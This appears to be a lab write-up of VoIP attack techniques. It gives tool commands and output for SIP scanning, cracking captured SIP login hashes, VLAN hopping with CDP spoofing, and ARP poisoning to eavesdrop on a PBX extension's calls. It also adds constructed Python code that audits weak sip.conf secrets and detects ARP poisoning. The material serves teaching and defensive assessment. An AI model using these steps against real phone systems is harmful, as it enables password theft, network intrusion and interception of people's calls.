1. Scanning and enumeration phase

Let's use smap against the PBX server. smap can scan a single IP or a subnet of IP addresses for SIP-enabled devices.
root@bt:/pentest/voip/smap# ./smap -O 192.168.1.130
smap 0.6.0  mn@123.org http:/www.sitename.com
192.168.1.130 : ICMP reachable, SIP enabled
Best guess (55% sure) fingerprint:
	Asterisk PBX (unknown version)
	User Agent Asterisk PBX 1.6.0.15-FONCORE-r78
1  host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

To scan a single host, use the command below:

root@bt:/pentest/voip/smap# ./smap 192.168.1.104
smap 0.6.0  http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

Scanning a range of IP addresses:

root@bt:/pentest/voip/smap# ./smap 192.168.1.130/24
smap 0.6.0  http://www.wormulon.net/
192.168.1.20: ICMP reachable, SIP enabled
192.168.1.22: ICMP reachable, SIP enabled
192.168.1.0: ICMP unreachable, SIP disabled
192.168.1.1: ICMP unreachable, SIP disabled
192.168.1.2: ICMP unreachable, SIP disabled
192.168.1.3: ICMP unreachable, SIP disabled
----EDIT---
192.168.1.250: ICMP unreachable, SIP disabled
192.168.1.251: ICMP unreachable, SIP disabled
192.168.1.252: ICMP unreachable, SIP disabled
192.168.1.253: ICMP unreachable, SIP disabled
192.168.1.254: ICMP unreachable, SIP disabled
192.168.1.255: ICMP unreachable, SIP disabled

256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)

We can use smap's -O option to fingerprint the server/client type and version, as shown below:
root@bt:/pentest/voip/smap# ./smap -O 192.168.1.104
smap 0.6.0  http://www.wormulon.net/
192.168.1.104: ICMP reachable, SIP enabled
best guess (70% sure) fingerprint:
  Asterisk PBX SVN-trunk-r56579
  User-Agent: Asterisk PBX

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

-----------------------------------------------------------------------------
2. Yielding passwords

We will dump the authentication data from the capture file auth.pcap using sipdump, a tool that is part of the sipcrack suite.
root@bt:/pentest/voip/sipcrack# ./sipdump auth.txt -p auth.pcap
* Using pcap file auth.pcap for sniffing
* Starting to sniff with packet filter tcp or udp or vlan

* Dumped login from 192.168.1.130 -> 192.168.1.132 (User 100)
* Dumped login from 192.168.1.130 -> 192.168.1.132 (User 100)

* Exiting sniffed 2 logins

We will now use the sipcrack tool to crack the authentication hashes, guessing them with a custom word list. Results from this activity will be stored in the file named auth.txt.
root@bt:/pentest/voip/sipcrack# ./sipcrack auth.txt -w wordlist.txt
* Found accounts
Num	Server		Client		User	Hash/Password
1	192.168.1.132	192.168.1.130	100	266985602b32305ac254d2087c...
2	192.168.1.132	192.168.1.130	100	5241a520b547852e2581b2323a...
3	192.168.1.132	192.168.1.130	100	e54b78d854126ba4587a4150b1...
Select which entry to crack (1 - 3)  : 1
* Generating static md5 hash. . .  cae5479224126b852e2581 
* Starting brute force against user 100 md5 (266985602b32305ac254d2087)
* Loaded wordlist:  wordlist.txt
* Starting brute force against user 100 md5 (266985602b32305ac254d2087)
* Tried 48 passwords in 0 seconds
* Found password:  123
* Updating dump file  auth.txt . . .done
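
The session above recovered the password 123 for user 100 after 48 guesses, so the strength of each extension's secret is what stands between a captured login and a working account. The following is an added example, not part of the original write-up or of any tool shown here: a Python audit of secret= values in an Asterisk sip.conf. The sample file, the small wordlist and the 12-character minimum are constructed assumptions.

```python
import configparser

# Constructed sample in Asterisk sip.conf style (not taken from the page's PBX).
SAMPLE_SIP_CONF = """
[general]
context=default

[100]
type=friend
secret=123

[102]
type=friend
secret=T7#qLm2v!xRe9pKd

[103]
type=friend
secret=103
"""

# Constructed stand-in for the wordlist an assessor would try first.
COMMON = {"123", "1234", "password", "asterisk", "voip"}

def audit_secrets(conf_text, wordlist=COMMON, min_len=12):
    """Return {peer: [reasons]} for every peer whose secret is easy to guess."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(conf_text)
    findings = {}
    for peer in cp.sections():
        if not cp.has_option(peer, "secret"):
            continue  # e.g. [general], or peers authenticated another way
        secret = cp.get(peer, "secret")
        reasons = []
        if len(secret) < min_len:  # min_len is an assumed policy value
            reasons.append("short")
        if secret.isdigit():
            reasons.append("digits-only")
        if secret == peer:
            reasons.append("same-as-extension")
        if secret.lower() in wordlist:
            reasons.append("in-wordlist")
        if reasons:
            findings[peer] = reasons
    return findings

if __name__ == "__main__":
    for peer, reasons in audit_secrets(SAMPLE_SIP_CONF).items():
        print(f"extension {peer}: weak secret ({', '.join(reasons)})")
```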
--------------------------------------------------------------------------------

3. VLAN Hopping

Change to the following directory to run voiphopper.
root@bt:/pentest/voip/voiphopper#
root@bt:/pentest/voip/voiphopper# ./voiphopper
voiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID>
Please specify 1 base option mode:
CDP Sniff Mode (-c 0)
Example:  voiphopper -i eth0 -c 0
CDP Spoof Mode with custom packet (-c 1):
-D  (Device ID)
-P  (Port ID)
-C  (Capabilities)
-L  (Platform)
-S  (Software)
-U  (Duplex)
Example:  voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1
CDP Spoof Mode with pre-made packet (-c 2)
Example:  voiphopper -i eth0 -c 2
Avaya DHCP Option Mode (-a):
Example:  voiphopper -i eth0 -a
VLAN Hop Mode (-v VLAN ID):
Example:  voiphopper -i eth0 -v 200
Nortel DHCP Option Mode (-n):
Example:  voiphopper -i eth0 -n


root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20
VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 2
Added VLAN 20 to Interface eth0
Attempting dhcp request for new interface eth0.20

eth0.20   Link encap:Ethernet  HWaddr 00:0c:29:84:98:b2
          inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:2274 (2.2 KB)
-----------------------------------------------------------------------------------

4. VoIP MAC spoofing

Ucsniff can identify the MAC address automatically, but if we wish to identify it separately, we can use nmap as shown below.
root@bt: # nmap 192.168.1.132
Starting nmap 5.51 (http://nmap.org) at 2013-08-06 14:28 
Nmap scan report for 192.168.1.132
Host is up (0.000028s latency) 
Not shown : 992 closed ports
PORT 		STATE 		SERVICE
135/tcp		open		msrpc
139/tcp		open		netbios-ssn
1433/tcp	open		ms-sql-s
9535/tcp	open		man
9593/tcp	open		cbas
9594/tcp	open		sgsys
9595/tcp	open		pds
MAC address : 00:15:DB:10:D4:B0 (Intel corporation)
Nmap done : 1 IP address (1 host is up) scanned in 1.53 seconds


root@bt:/pentest/voip/ucsniff 8.10# ucsniff -i eth0 -T
ucsniff 8.10 starting
Displaying the discovered targets list
Extension 		Name 			IP			Protocol
100			User A			192.168.1.132		sip
102			User B			192.168.1.133		sip

Please select one endpoint (1 - 2) from the discovered targeted list
1
Target selected for input user eavesdropping.
100			User A			192.168.1.132		sip
Listening on eth0 ...    (Ethernet)
Eth 0		00:0c:28:F7:6d:71	192.168.1.133		255.255.255.0
Randomizing 255 hosts for scanning...
* |...................................................................................>|  100.00%
3 hosts added to the host list...
3 hosts saved to arpsaver.txt...
ARP poisoning victims
GROUP 1 : 192.168.1.132 00:15:DB:10:D4:B0
GROUP 2 : ANY (All of the hosts in the list)
Starting unified sniffing...
Warning : Please ensure you hit q when you are finished with this program.
Warning : q re-ARPs the victim. Failure to do so before program exit will result in DoS.
Listening for new calls to and from target User A (extension 100, IP 192.168.1.132)
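
The ARP poisoning step above leaves a trace on the wire: the victim's IP starts resolving to the sniffing host's MAC, and that one MAC answers for several IPs. The following is an added detection example, not part of the original write-up or of ucsniff: it reads constructed tcpdump-style ARP reply lines that reuse the addresses from the session (the MAC 00:11:22:33:44:55 for 192.168.1.130 is made up) and treats the first MAC seen for an IP as its baseline, which is an assumption; an inventory or DHCP lease table is a better baseline.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style ARP replies; not captured from a real network.
SAMPLE_ARP_LOG = """\
14:28:01 ARP, Reply 192.168.1.132 is-at 00:15:db:10:d4:b0, length 46
14:28:02 ARP, Reply 192.168.1.133 is-at 00:0c:28:f7:6d:71, length 46
14:28:05 ARP, Reply 192.168.1.130 is-at 00:11:22:33:44:55, length 46
14:30:10 ARP, Reply 192.168.1.132 is-at 00:0C:28:F7:6D:71, length 46
14:30:10 ARP, Reply 192.168.1.130 is-at 00:0C:28:F7:6D:71, length 46
14:30:12 ARP, Reply 192.168.1.132 is-at 00:0C:28:F7:6D:71, length 46
"""

REPLY = re.compile(r"^(\S+) ARP, Reply (\S+) is-at ([0-9A-Fa-f:]{17})")

def detect_arp_poisoning(log_text):
    """Alert on IPs whose MAC binding changes and on MACs answering for several IPs."""
    first_seen = {}                # ip -> first MAC observed (assumed baseline)
    ips_by_mac = defaultdict(set)  # mac -> every IP it has claimed
    reported = set()               # (ip, mac) pairs already alerted on
    alerts = []
    for line in log_text.splitlines():
        m = REPLY.match(line)
        if not m:
            continue
        ts, ip, mac = m.group(1), m.group(2), m.group(3).lower()
        ips_by_mac[mac].add(ip)
        baseline = first_seen.setdefault(ip, mac)
        if mac != baseline and (ip, mac) not in reported:
            reported.add((ip, mac))
            alerts.append({"type": "binding-changed", "time": ts,
                           "ip": ip, "was": baseline, "now": mac})
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append({"type": "mac-claims-many", "mac": mac, "ips": sorted(ips)})
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_LOG):
        print(alert)
```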
-------------------------------------------------------------------------------------------------
